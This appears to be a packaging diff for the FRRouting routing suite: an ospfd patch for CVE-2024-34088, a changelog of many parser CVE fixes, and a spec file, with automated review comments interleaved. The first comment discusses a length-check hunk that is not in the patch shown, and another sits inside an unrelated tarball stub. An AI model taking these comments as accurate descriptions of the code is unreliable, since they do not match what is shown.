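Review bot: In the ospf_te_parse_ext_link() hunk the new guard accepts any non-zero `len` that matches the LSA size, but the next statement does `len -= EXT_TLV_LINK_SIZE` unconditionally, so an Extended Link TLV whose body is shorter than its fixed part (1..EXT_TLV_LINK_SIZE-1 bytes, which is a perfectly consistent LSA length) wraps `len` if it is unsigned, as `len` is declared `uint16_t` in the ospf_te_parse_ext_pref() hunk, and the following `for (; sum < len; ...)` then walks far past the LSA — the same overflow class this patch is fixing. The guard should require the fixed part, e.g. `if (len != i || len < EXT_TLV_LINK_SIZE) {`, and the ext_pref check has the same shape: `len <= 0` on an unsigned value only rejects zero, so a lower bound of the Extended Prefix fixed part belongs there too. The declaration of `len` in ospf_te_parse_ext_link() and the rest of the sub-TLV loop are outside the hunk, so the wrap is inferred from the sibling declaration rather than seen.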
@@ -0,0 +1,82 @@
+From cef38442420aeac8e163f8aa55f1b985908f993c Mon Sep 17 00:00:00 2001
+From: Olivier Dugeon
+Date: Tue, 16 Apr 2024 16:42:06 +0200
+Upstream: yes
+References: CVE-2024-34088,bsc#1223786,gh#FRRouting/frr#16088
+Subject: [PATCH 3/3] ospfd: protect call to get_edge() in ospf_te.c
+
+During fuzzing, Iggy Frankovic discovered that get_edge() function in ospf_te.c
+could return null pointer, in particular when the link_id or advertised router
+IP addresses are fuzzed. As the null pointer returned by get_edge() function is
+not handlei by calling functions, this could cause ospfd crash.
+
+This patch introduces new verification of returned pointer by get_edge()
+function and stop the processing in case of null pointer. In addition, link ID
+and advertiser router ID are validated before calling ls_find_edge_by_key() to
+avoid the creation of a new edge with an invalid key.
+
+CVE-2024-34088
+
+Co-authored-by: Iggy Frankovic
+Signed-off-by: Olivier Dugeon
+(cherry picked from commit 8c177d69e32b91b45bda5fc5da6511fa03dc11ca)
+---
+ ospfd/ospf_te.c | 19 ++++++++++++++++---
+ 1 file changed, 16 insertions(+), 3 deletions(-)
+
+diff --git a/ospfd/ospf_te.c b/ospfd/ospf_te.c
+index 23a1b181ec..d1f114e30a 100644
+--- a/ospfd/ospf_te.c
++++ b/ospfd/ospf_te.c
+@@ -1686,6 +1686,11 @@ static struct ls_edge *get_edge(struct ls_ted *ted, struct ls_node_id adv,
+ struct ls_edge *edge;
+ struct ls_attributes *attr;
+
++ /* Check that Link ID and Node ID are valid */
++ if (IPV4_NET0(link_id.s_addr) || IPV4_NET0(adv.id.ip.addr.s_addr) ||
++ adv.origin != OSPFv2)
++ return NULL;
++
+ /* Search Edge that corresponds to the Link ID */
+ key = ((uint64_t)ntohl(link_id.s_addr)) & 0xffffffff;
+ edge = ls_find_edge_by_key(ted, key);
+@@ -1758,6 +1763,10 @@ static void ospf_te_update_link(struct ls_ted *ted, struct ls_vertex *vertex,
+
+ /* Get Corresponding Edge from Link State Data Base */
+ edge = get_edge(ted, vertex->node->adv, link_data);
++ if (!edge) {
++ ote_debug(" |- Found no edge from Link Data. Abort!");
++ return;
++ }
+ attr = edge->attributes;
+
+ /* re-attached edge to vertex if needed */
+@@ -2276,11 +2285,11 @@ static int ospf_te_parse_te(struct ls_ted *ted, struct ospf_lsa *lsa)
+ }
+
+ /* Get corresponding Edge from Link State Data Base */
+- if (IPV4_NET0(attr.standard.local.s_addr) && !attr.standard.local_id) {
+- ote_debug(" |- Found no TE Link local address/ID. Abort!");
++ edge = get_edge(ted, attr.adv, attr.standard.local);
++ if (!edge) {
++ ote_debug(" |- Found no edge from Link local add./ID. Abort!");
+ return -1;
+ }
+- edge = get_edge(ted, attr.adv, attr.standard.local);
+ old = edge->attributes;
+
+ ote_debug(" |- Process Traffic Engineering LSA %pI4 for Edge %pI4",
+@@ -2786,6 +2795,10 @@ static int ospf_te_parse_ext_link(struct ls_ted *ted, struct ospf_lsa *lsa)
+ lnid.id.ip.area_id = lsa->area->area_id;
+ ext = (struct ext_tlv_link *)TLV_HDR_TOP(lsa->data);
+ edge = get_edge(ted, lnid, ext->link_data);
++ if (!edge) {
++ ote_debug(" |- Found no edge from Extended Link Data. Abort!");
++ return -1;
++ }
+ atr = edge->attributes;
+
+ ote_debug(" |- Process Extended Link LSA %pI4 for edge %pI4",
+--
+2.35.3
+
diff --git a/frr-10.0.1.tar.gz b/frr-10.0.1.tar.gz
new file mode 100644
index 0000000..1eee213
--- /dev/null
+++ b/frr-10.0.1.tar.gz
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:56ea357c56ea55e19101fcf9824252c45ab3b6b419a7a29ead8028c96863e0e2
+size 10963132
diff --git a/frr-10.0.2.tar.gz b/frr-10.0.2.tar.gz
new file mode 100644
index 0000000..d093816
--- /dev/null
+++ b/frr-10.0.2.tar.gz
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f8cac2f3c9184d2392d1cd6fd9ea08c1e838d3b1fa633ea8845f01ed0fac50b3
+size 10968487
diff --git a/frr-8.4.tar.gz b/frr-8.4.tar.gz
new file mode 100644
index 0000000..cdfba41
--- /dev/null
+++ b/frr-8.4.tar.gz
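Review bot: get_edge() now rejects a zero link_id, and ospf_te_parse_te() passes `attr.standard.local` as that key, so a TE Link TLV that identifies the link only by a local interface ID (local address 0.0.0.0, non-zero local_id — the unnumbered case 0020 deliberately let through) is now aborted with "Found no edge from Link local add./ID"; if that is the accepted trade-off for never keying an edge on 0, the guard deserves a comment saying so, e.g. `/* link_id 0 (unnumbered link) is not a usable TED key; reject rather than share key 0 */`, otherwise the caller should fall back to local_id as the key. The rejection is also silent inside get_edge() while every caller logs the same generic "Found no edge" text, so an operator cannot tell a fuzzed or spoofed LSA (bad advertising router, wrong origin) from a merely unknown link; logging the offending link_id and adv router with `%pI4` at the point of rejection would make the new check observable. ospf_te_update_link() and the other callers begin outside the hunk.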
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4fe5dccf6d41218c3012c2b09c85c4cd65a96299ab400e487191515232f0ee8a
+size 9883194
diff --git a/frr-tmpfiles.d b/frr-tmpfiles.d
new file mode 100644
index 0000000..719f4b9
--- /dev/null
+++ b/frr-tmpfiles.d
@@ -0,0 +1 @@
+d @frr_statedir@ 0751 frr frrvty
diff --git a/frr.changes b/frr.changes
new file mode 100644
index 0000000..6cde8bf
--- /dev/null
+++ b/frr.changes
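Review bot: `d @frr_statedir@ 0751 frr frrvty` grants other-execute on the runtime directory, so any local user can traverse into it and reach whatever sockets or pid files the daemons create there, leaving each socket's own mode as the only access control; the frrvty group already gets r-x, which presumably covers vtysh users, so unless some other consumer needs traversal `d @frr_statedir@ 0750 frr frrvty -` is the safer default. If the o+x bit is intentional, a comment line in the file naming the consumer that requires it would stop the next maintainer from tightening it by accident. The trailing `-` age field is optional but is the conventional spelling and makes the line easier to read against other tmpfiles.d entries.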
@@ -0,0 +1,510 @@ +------------------------------------------------------------------- +Mon Sep 30 09:49:59 UTC 2024 - Marius Tomaschewski + +- Update to frr 10.0.2 release providing fix for CVE-2024-44070 + and other issues, see https://frrouting.org/release/10.0.2/ +- Removed patch included in the sources: + [- 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch] + +------------------------------------------------------------------- +Mon Sep 16 16:36:31 UTC 2024 - Marius Tomaschewski + +- add release notes url to 10.0.1 update + +------------------------------------------------------------------- +Mon Sep 16 11:31:12 UTC 2024 - Marius Tomaschewski + +- fixed bug/pull request references in frr.changes file + +------------------------------------------------------------------- +Thu Aug 22 13:02:19 UTC 2024 - Marius Tomaschewski + +- Apply upstream fix for crash in bgp_attr_encap that were missing + a check of the actual remaining stream length before taking the + TLV value (CVE-2024-44070,bsc#1229438,gh#FRRouting/frr#16502): + + 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch +- Re-added 0001-disable-zmq-test.patch to avoid (sporadic or arch + specific, e.g. aarch64) "make check" test failures (bsc#1180217). + + 0001-disable-zmq-test.patch +- Re-added hardening patch for systemd service(s) (bsc#1181400): + + harden_frr.service.patch +- Cleanup unknown --enable-systemd and correct the --sysconfdir + and --localstatedir configure options to not end in …/frr. + +------------------------------------------------------------------- +Fri Aug 9 14:14:10 UTC 2024 - Erico Mendonca + +- Fixing Source URL/archive name. + +------------------------------------------------------------------- +Sun Jul 28 20:21:43 UTC 2024 - Erico Mendonca + +- Update to version 10.0.1 from official sources. + See https://frrouting.org/release/10.0.1/ +- Clean slate: removing all previous patches. 
+- The following patches were obsoleted: + - 0001-disable-zmq-test.patch + - harden_frr.service.patch + - 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch + - 0004-tools-remove-backslash-from-declare-check-regex.patch + - 0005-root-ok-in-account-frr.pam.patch + - 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch + - 0007-bgpd-Ensure-stream-received-has-enough-data.patch + - 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch + - 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch + - 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch + - 0011-babeld-fix-11808-to-avoid-infinite-loops.patch + - 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch + - 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch + - 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch + - 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch + - 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch + - 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch + - 0018-bgpd-Flowspec-overflow-issue.patch + - 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch + - 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch + - 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch + - 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch + - 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch + +------------------------------------------------------------------- +Tue Jun 4 21:27:48 UTC 2024 - Marius Tomaschewski + +- Apply upstream fix solving ospfd denial of service via get_edge() + function returning a NULL pointer (CVE-2024-34088,bsc#1223786, + gh#FRRouting/frr#16088). 
+ [+ 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch] +- Apply upstream fix solving ospfd buffer overflow and daemon crash + in ospf_te_parse_ext_link for OSPF LSA packets during an attempt + to read Segment Routing Adjacency SID subTLVs (CVE-2024-31951, + bsc#1222528,gh#FRRouting/frr#16088). + [+ 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch] +- Apply upstream fix solving ospfd buffer overflow and daemon crash + in RI parsing with OSPF TE (CVE-2024-31950,bsc#1222526, + gh#FRRouting/frr#16088). + [+ 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch] + +------------------------------------------------------------------- +Wed Apr 24 10:40:57 UTC 2024 - Marius Tomaschewski + +- Apply upstream fix solving crash in OSPF TE parsing (bsc#1220548, + CVE-2024-27913, gh#FRRouting/frr#15431) + [+ 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch] + +------------------------------------------------------------------- +Wed Apr 10 18:59:00 UTC 2024 - Clemens Famulla-Conrad + +- add + 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch: + * Apply upstream fix on error handling when receiving BGP Prefix + SID attribute (bsc#1222518,CVE-2024-31948,gh#FRRouting/frr#15628) + +------------------------------------------------------------------- +Thu Feb 8 06:55:28 UTC 2024 - Dominique Leuenberger + +- Provide user/group symbol for user created during pre. + +------------------------------------------------------------------- +Fri Feb 2 08:25:36 UTC 2024 - Dominique Leuenberger + +- Fix build with RPM 4.19: a stray %-escape sequence was found in + the files section. 
+ +------------------------------------------------------------------- +Mon Dec 4 09:11:46 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for a crash on malformed BGP UPDATE message + with an EOR, because the presence of EOR does not lead to a + treat-as-withdraw outcome (CVE-2023-47235,bsc#1216896,https://github.com/FRRouting/frr/pull/14716/commits/6814f2e0138a6ea5e1f83bdd9085d9a77999900b) + [+ 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch] +- Apply upstream fix for a crash on crafted BGP UPDATE message with + a MP_UNREACH_NLRI attribute and additional NLRI data (CVE-2023-47234, + bsc#1216897,https://github.com/FRRouting/frr/pull/14716/commits/c37119df45bbf4ef713bc10475af2ee06e12f3bf) + [+ 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch] +- Apply upstream fix for attempts to read beyond the end of the + stream during labeled unicast parsing (CVE-2023-38407,bsc#1216899,https://github.com/FRRouting/frr/pull/12956/commits/ab362eae68edec12c175d9bc488bcc3f8b73d36f) + [+ 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch] +- Apply upstream fix for an nlri length of zero mishandling, aka + "flowspec overflow" (CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3) + [+ 0018-bgpd-Flowspec-overflow-issue.patch] + +------------------------------------------------------------------- +Mon Oct 30 12:38:21 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for a crash due to a crafted BGP UPDATE message + (CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4). + [+ 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch] +- Apply upstream fix for a crash due to mishandled malformed + MP_REACH_NLRI data (CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35). 
+ [+ 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch] + +------------------------------------------------------------------- +Tue Sep 12 13:40:19 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for NULL pointer dereference due to processing + of malformed requests with no attributes in bgp_nlri_parse_flowspec + (CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8). + [+ 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch] + +------------------------------------------------------------------- +Wed Aug 30 17:15:35 UTC 2023 - Marius Tomaschewski + +- Removed protobuf-c BuildRequires (source package name) breaking + build-system setup with libprotobuf-c-devel 1.3.2 updates. +- Apply upstream fix for bgpd: Don't read initial byte of the ORF + header in an ahead-of-stream situation (CVE-2023-41360, + bsc#1214739,https://github.com/FRRouting/frr/pull/14245) + [+ 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch] +- Apply upstream fix for bgpd: Do not process NLRIs if the attribute + length is zero (CVE-2023-41358,bsc#1214735, + https://github.com/FRRouting/frr/pull/14260) + [+ 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch] +- Apply upstream fix bgpd: Use treat-as-withdraw for tunnel encapsulation + attribute instead of session reset (CVE-2023-38802,bsc#1213284, + https://github.com/FRRouting/frr/pull/14290) + [+ 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch] +- Apply upstream fix babeld: avoid infinite loops (CVE-2023-3748,bsc#1213434, + gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952) + [+ 0011-babeld-fix-11808-to-avoid-infinite-loops.patch] + +------------------------------------------------------------------- +Mon May 15 08:01:39 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for denial of service via the bgp_capability_llgr() + function (bsc#1211248,CVE-2023-31489,gh#FRRouting/frr#13098). 
+ [+ 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch] +- Apply upstream fix for denial of service via the bgp_attr_psid_sub() + function (bsc#1211249,CVE-2023-31490,gh#FRRouting/frr#13099). + [+ 0007-bgpd-Ensure-stream-received-has-enough-data.patch] + +------------------------------------------------------------------- +Mon Apr 3 14:00:27 UTC 2023 - Marius Tomaschewski + +- Enable pim6d providing PIMv6 support (bsc#1206234) + +------------------------------------------------------------------- +Fri Jan 13 12:27:58 UTC 2023 - Stefan Schubert + +- Migration of PAM settings to /usr/lib/pam.d. + +------------------------------------------------------------------- +Fri Nov 11 13:04:52 UTC 2022 - Marius Tomaschewski + +- Migration to /usr/etc: Conditionally moved /etc/logrotate.d/frr + file to vendor specific directory /usr/etc/logrotate.d and added + saving of user changed configuration files in /etc and restoring + them while an RPM update. +- Declare root as sufficient also in the pam account verification; + without vtysh use causes to log a pam frr:account warnings + (https://github.com/FRRouting/frr/pull/12308) + [+ 0005-root-ok-in-account-frr.pam.patch] +- Applied fix removing a not needed backslash causing to log a warning + (https://github.com/FRRouting/frr/pull/12307) + [+ 0004-tools-remove-backslash-from-declare-check-regex.patch] +- Applied upstream fixes for frrinit.sh to avoid a privilege escalation + from frr to root in frr config creation (bsc#1204124,CVE-2022-42917, + https://github.com/FRRouting/frr/pull/12157). 
+ [+ 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch] +- Removed obsolete patches provided in the 8.4 source archive: + [- 0003-babeld-fix-10487-by-adding-a-check-on-packet-length.patch, + - 0004-babeld-fix-10502-10503-by-repairing-the-checks-on-le.patch, + - 0005-isisd-fix-router-capability-TLV-parsing-issues.patch, + - 0006-isisd-fix-10505-using-base64-encoding.patch, + - 0007-bgpd-Make-sure-hdr-length-is-at-a-minimum-of-what-is.patch, + - 0008-isisd-Ensure-rcap-is-freed-in-error-case.patch] +- Update to version 8.4, see https://frrouting.org/release/8.4/ + * New BGP command (neighbor PEER soo) to configure SoO to prevent + routing loops and suboptimal routing on dual-homed sites. + * Command debug bgp allow-martian replaced to bgp allow-martian-nexthop + because previously we allowed using martian next-hops when debug is + turned on. + * Implement BGP Prefix Origin Validation State Extended Community rfc8097 + * Implement Route Leak Prevention and Detection Using Roles in UPDATE + and OPEN Messages rfc9234 + * BMP L3VPN support + * PIMv6 support + * MLD support + * New command to enable using reserved IPv4 ranges as normal addresses + for BGP next-hops, interface addresses, etc. + * As usual, lots of bugs and memory leaks were fixed \m/ + such as a fix for a possible use-after-free due to a race + condition related to bgp_notify_send_with_data() and + bgp_process_packet() in bgp_packet.c. This could lead to + Remote Code Execution or Information Disclosure by sending + crafted BGP packets (CVE-2022-37035,bsc#1202085). 
+- Update to version 8.3, see https://frrouting.org/release/8.3/ + * Notification Message support for BGP Graceful Restart + * BGP Cease Notification Subcode For BFD + * Send Hold Timer for BGP + * RFC5424 syslog support + * PIM passive command +- Update to version 8.2.2, see https://frrouting.org/release/8.2.2/ + * BGP Long-lived graceful restart capability + * BGP Extended Optional Parameters Length for BGP OPEN Message + * BGP Extended BGP Administrative Shutdown Communication + * IS-IS Link State Traffic Engineering support + * OSPFv3 Support for NSSA Type-7 address ranges + * PBR VLAN actions support + +------------------------------------------------------------------- +Mon Sep 5 11:48:25 UTC 2022 - Marius Tomaschewski + +- Apply upstream fix for out-of-bounds read in the BGP daemon + that may lead to information disclosure or denial of service + (bsc#1202023,CVE-2022-37032) + [+ 0007-bgpd-Make-sure-hdr-length-is-at-a-minimum-of-what-is.patch] +- Apply upstream fix for a memory leak in the IS-IS daemon that + may lead to server memory exhaustion (bsc#1202022,CVE-2019-25074) + [+ 0008-isisd-Ensure-rcap-is-freed-in-error-case.patch] + +------------------------------------------------------------------- +Thu Mar 17 11:45:00 UTC 2022 - Dominique Leuenberger + +- Make build a bit cheaper: do only BuildRequire the primary python + interpreter and its modules (python3-FOO) instead of all + available versions as done using %{python_module FOO} + +------------------------------------------------------------------- +Mon Feb 28 11:05:48 UTC 2022 - Marius Tomaschewski + +- Apply fix for a buffer overflow in isisd due to the use of strdup + with a non-zero-terminated binary string (bsc#1196506,CVE-2022-26126) + [+ 0006-isisd-fix-10505-using-base64-encoding.patch] +- Apply fix for a buffer overflow in isisd due to wrong checks on + the input packet length (bsc#1196505,CVE-2022-26125) with workaround + for the GIT binary patch to tests/isisd/test_fuzz_isis_tlv_tests.h.gz + 
[+ 0005-isisd-fix-router-capability-TLV-parsing-issues.patch] +- Apply fix for a buffer overflow in babeld due to wrong checks on + the input packet length in the packet_examin and subtlv parsing + (bsc#1196504,bsc#1196507,CVE-2022-26128,CVE-2022-26129) + [+ 0004-babeld-fix-10502-10503-by-repairing-the-checks-on-le.patch] +- Apply fix for a heap buffer overflow in babeld due to missing check + on the input packet length (bsc#1196503,CVE-2022-26127) + [+ 0003-babeld-fix-10487-by-adding-a-check-on-packet-length.patch] + +------------------------------------------------------------------- +Thu Dec 9 08:40:11 UTC 2021 - Johannes Segitz + +- Add ReadWritePaths=/etc/frr to harden_frr.service.patch (bsc#1181400). + +------------------------------------------------------------------- +Wed Nov 17 05:48:12 UTC 2021 - Linnaea Lavia + +- Update to version 8.1 + * Graceful Restart for OSPFv2 and OSPFv3 + * OSPFv3 NSSA and NSSA-TSA support + * OSPFv3 ASBR Summarisation Support + * BGP SRv6 and Prefix-SID Type 5 improvements + * BGP EVPN type-5 gateway IP overlay Index + * Lua hook support + * See: https://frrouting.org/release/8.1/ + +------------------------------------------------------------------- +Fri Oct 15 12:11:50 UTC 2021 - Johannes Segitz + +- Drop ProtectClock hardening, can cause issues if other device acceess is needed + +------------------------------------------------------------------- +Sat Oct 9 01:58:08 UTC 2021 - Linnaea Lavia + +- Update to version 8.0.1 + * refreshed patch: + - 0001-disable-zmq-test.patch + - harden_frr.service.patch + * LDP gained SNMP support + * OSPFv3 gained VRF support + * EVPN Multihoming is now fully supported + * TI-LFA implemented in IS-IS and OSPS + * New Segment Routing daemon + * See: https://frrouting.org/release/8.0/ + and https://github.com/FRRouting/frr/releases/tag/frr-8.0.1 + +------------------------------------------------------------------- +Thu Sep 16 07:12:55 UTC 2021 - Johannes Segitz + +- Added hardening to systemd 
service(s) (bsc#1181400). Added patch(es): + * harden_frr.service.patch + +------------------------------------------------------------------- +Fri Apr 23 03:05:06 UTC 2021 - Marius Tomaschewski + +- Use skip, not xfail in 0001-disable-zmq-test.patch to disable + zmq test as it is not expected to fail but hangs (bsc#1180217) + +------------------------------------------------------------------- +Thu Mar 4 21:20:02 UTC 2021 - Martin Hauke + +- Update to version 7.5.1 + * Maintenance release + See: https://github.com/FRRouting/frr/blob/stable/7.5/changelog-auto.in + +------------------------------------------------------------------- +Fri Jan 8 08:08:08 UTC 2021 - olaf@aepfle.de + +- Requires libyang 1.0.184 + +------------------------------------------------------------------- +Tue Dec 22 10:54:56 UTC 2020 - Rubén Torrero Marijnissen + +- Disable ZeroMQ tests due to sporadic timeouts during package builds (bsc#1180217) + [+ 0001-disable-zmq-test.patch] + +------------------------------------------------------------------- +Wed Nov 4 19:17:10 UTC 2020 - Martin Hauke + +- Update to version 7.5 + * Upstream does not provide a changelog +- Make grpc support optional and don't enable it by default + +------------------------------------------------------------------- +Fri Oct 2 12:38:25 UTC 2020 - Marius Tomaschewski + +- add build condition disabling mininet build require by default, + needed by the optional topology tests. +- removed one occurrence of vrrpd binary listed twice in file list + +------------------------------------------------------------------- +Wed Jul 1 12:21:24 UTC 2020 - Martin Hauke + +- Update to version 7.4 + * Upstream does not provide a changelog +- Drop patch (fixed upstream): + * 0001-build-use-configfile-mode-in-init-script.patch + +------------------------------------------------------------------- +Sun May 31 22:40:46 UTC 2020 - Erico Mendonca + +- 0001-build-use-configfile-mode-in-init-script.patch: Fix CVE-2020-12831 (boo#1171658). 
+ +------------------------------------------------------------------- +Wed May 6 16:07:32 UTC 2020 - Martin Hauke + +- Update to version 7.3.1 + Bugfix/maintenance release + * Upstream does not provide a changelog + +------------------------------------------------------------------- +Tue Apr 7 21:38:12 UTC 2020 - Marcus Rueckert + +- enable verbose make rules +- enable grpc support. new subpackage libfrrgrpc_pb0, new BR: + pkgconfig(grpc) +- enable config rollbacks. new BR: pkgconfig(sqlite3) +- enable realms support +- enable shell access +- make sure we use system openssl +- fix shebang line of the frr-reload.py and + generate_support_bundle.py script so we dont pull python2 +- do not delete users and groups. +- add Requires for libyang-extentions + +------------------------------------------------------------------- +Sat Feb 15 21:27:22 UTC 2020 - Martin Hauke + +- Update to version 7.3 + * Upstream does not provide a changelog this time +- Remove patch: + * fix_tests.patch (not longer needed) + +------------------------------------------------------------------- +Sat Jan 18 20:25:42 UTC 2020 - Martin Hauke + +- Update to version 7.2.1: + BGPd + * Fix Addpath issue + * Do not apply eBGP policy for iBGP peers + * Show ip and fqdn in json output for show [ip] bgp json + * Fix large route-distinguisher's format + * Fix no bgp listen range ... 
configuration command + * Autocomplete neighbor for clear bgp + * Reflect the distance in RIB when it is changed for an + arbitrary afi/safi + * Notify "Peer De-configured" after entering 'no neighbor cmd + * Fix per afi/safi addpath peer counting + * Rework BGP dampening to be per AFI/SAFI + * Do not send next-hop as :: in MP_REACH_NLRI if no link-local + exists + * Override peer's TTL only if peer-group is configured with TTL + * Remove error message for unkown afi/safi combination + * Keep the session down if maximum-prefix is reached + OSPFd + * Fix BFD down not tearing down OSPF adjacency for + point-to-point net + BFDd + * Fix multiple VRF handling + * VRF security improvement + PIMd + * Fix rp crash + NHRPd + * Make sure no ip nhrp map works as expected + LDPd + * Add missing sanity check in the parsing of label messages + Zebra + * Use correct state when installing evpn macs + * Capture dplane plugin flags + lib + * Fix interface config when vrf changes + * Fix Interface Infinite Loop Walk (for special interfaces such + as bond) + Others + * Rename man pages (to avoid conflicts with other packages) + * Various other fixes for code cleanup and memory leaks + +------------------------------------------------------------------- +Fri Jan 17 21:07:45 UTC 2020 - Martin Hauke + +- Fix license tag + +------------------------------------------------------------------- +Wed Jan 15 20:34:50 UTC 2020 - Martin Hauke + +- Build with support for pcre, protobuf, rpki and zeromq by default + +------------------------------------------------------------------- +Wed Jan 15 14:34:59 UTC 2020 - Ismail Dönmez + +- Cleanup spec file + +------------------------------------------------------------------- +Sun Jan 12 09:40:39 UTC 2020 - Martin Hauke + +- Fix build-time dependencies +- Remove superflous comments + +------------------------------------------------------------------- +Wed Dec 11 23:18:06 UTC 2019 - Erico Mendonca + +- fix_tests.patch: correct syntax for Python 3 
imports in tests. +- Enabling tests + +------------------------------------------------------------------- +Wed Dec 11 02:37:42 UTC 2019 - erico.mendonca@suse.com + +- Update to version frr7.2: + * zebra: use correct state when installing evpn macs + * lib: set entry to xpath in if_update_to_new_vrf + * zebra: capture dplane plugin flags + * bgpd: Autocomplete neighbor for clear bgp + * ospfd,eigrpd: don't take address of packed struct member + * bgpd: Prevent crash in bgp_table_range_lookup + * bgpd: Fix memory leak in json output of show commands + * tests: Test if `distance bgp (1-255) (1-255) (1-255)` works + * bgpd: Reflect the distance in RIB when it is changed for an arbitrary afi/safi + * bfdd: fix multiple VRF handling + +------------------------------------------------------------------- +Tue Dec 10 12:58:21 UTC 2019 - Erico Mendonca + +- Updating to version 7.2 +- Adding systemd scripts +- Fixing build and permission issues + +------------------------------------------------------------------- +Tue Jun 18 08:59:05 UTC 2019 - Martin Hauke + +- Update to version 7.0.1 + +------------------------------------------------------------------- +Sat Feb 2 13:50:16 UTC 2019 - mardnh@gmx.de + +- Initial package, version 6.0.2 diff --git a/frr.spec b/frr.spec new file mode 100644 index 0000000..b26caaf --- /dev/null +++ b/frr.spec 
@@ -0,0 +1,504 @@
+#
+# spec file for package frr
+#
+# Copyright (c) 2024 SUSE LLC
+# Copyright (c) 2019-2021, Martin Hauke
+#
+# All modifications and additions to the file contributed by third parties
+# remain the property of their copyright owners, unless otherwise agreed
+# upon. The license for this file, and modifications and additions to the
+# file, is the same license as for the pristine package itself (unless the
+# license for the pristine package is not an Open Source License, in which
+# case the license is the MIT License). An "Open Source License" is a
+# license that conforms to the Open Source Definition (Version 1.9)
+# published by the Open Source Initiative.
+
+# Please submit bugfixes or comments via https://bugs.opensuse.org/
+#
+
+
+%bcond_with cumulus
+%bcond_with datacenter
+%bcond_with mininet
+%bcond_with grpc
+
+%define frr_user frr
+%define frr_group frr
+%define frrvty_group frrvty
+%define frr_home %{_localstatedir}/lib/%{name}
+%define frr_statedir %{_rundir}/%{name}
+%define frr_daemondir %{_prefix}/lib/frr
+
+Name: frr
+Version: 10.0.2
+Release: 0
+Summary: The FRRouting Protocol Suite
+License: GPL-2.0-or-later AND LGPL-2.1-or-later
+Group: Productivity/Networking/System
+URL: https://www.frrouting.org
+#Git-Clone: https://github.com/FRRouting/frr.git
+Source: https://github.com/FRRouting/frr/archive/refs/tags/%{name}-%{version}.tar.gz
+Source1: %{name}-tmpfiles.d
+Patch0: harden_frr.service.patch
+Patch1: 0001-disable-zmq-test.patch
+BuildRequires: autoconf
+BuildRequires: automake
+BuildRequires: bison >= 2.7
+BuildRequires: flex
+BuildRequires: libtool
+BuildRequires: makeinfo
+BuildRequires: python3-Sphinx
+BuildRequires: python3-devel
+BuildRequires: python3-pytest
+%if %{with mininet}
+BuildRequires: mininet
+%endif
+BuildRequires: net-snmp-devel
+BuildRequires: pam-devel
+BuildRequires: pkgconfig
+BuildRequires: python-rpm-macros
+BuildRequires: readline-devel
+BuildRequires: systemd-rpm-macros
+%if %{with grpc}
+BuildRequires: pkgconfig(grpc)
+%endif
+BuildRequires: pkgconfig(json-c)
+BuildRequires: pkgconfig(libcap)
+BuildRequires: pkgconfig(libcares)
+BuildRequires: pkgconfig(libelf)
+BuildRequires: pkgconfig(libpcre)
+BuildRequires: pkgconfig(libprotobuf-c)
+%if 0%{?sle_version} == 150500
+BuildRequires: libprotoc25_1_0
+BuildRequires: libyang1
+%endif
+BuildRequires: pkgconfig(libsystemd)
+BuildRequires: pkgconfig(libyang) >= 2.0.0
+BuildRequires: pkgconfig(libzmq) >= 4.0.0
+BuildRequires: pkgconfig(rtrlib) >= 0.5.0
+BuildRequires: pkgconfig(sqlite3)
+Requires(post): %{install_info_prereq}
+Requires(pre): %{install_info_prereq}
+Requires(pre): shadow
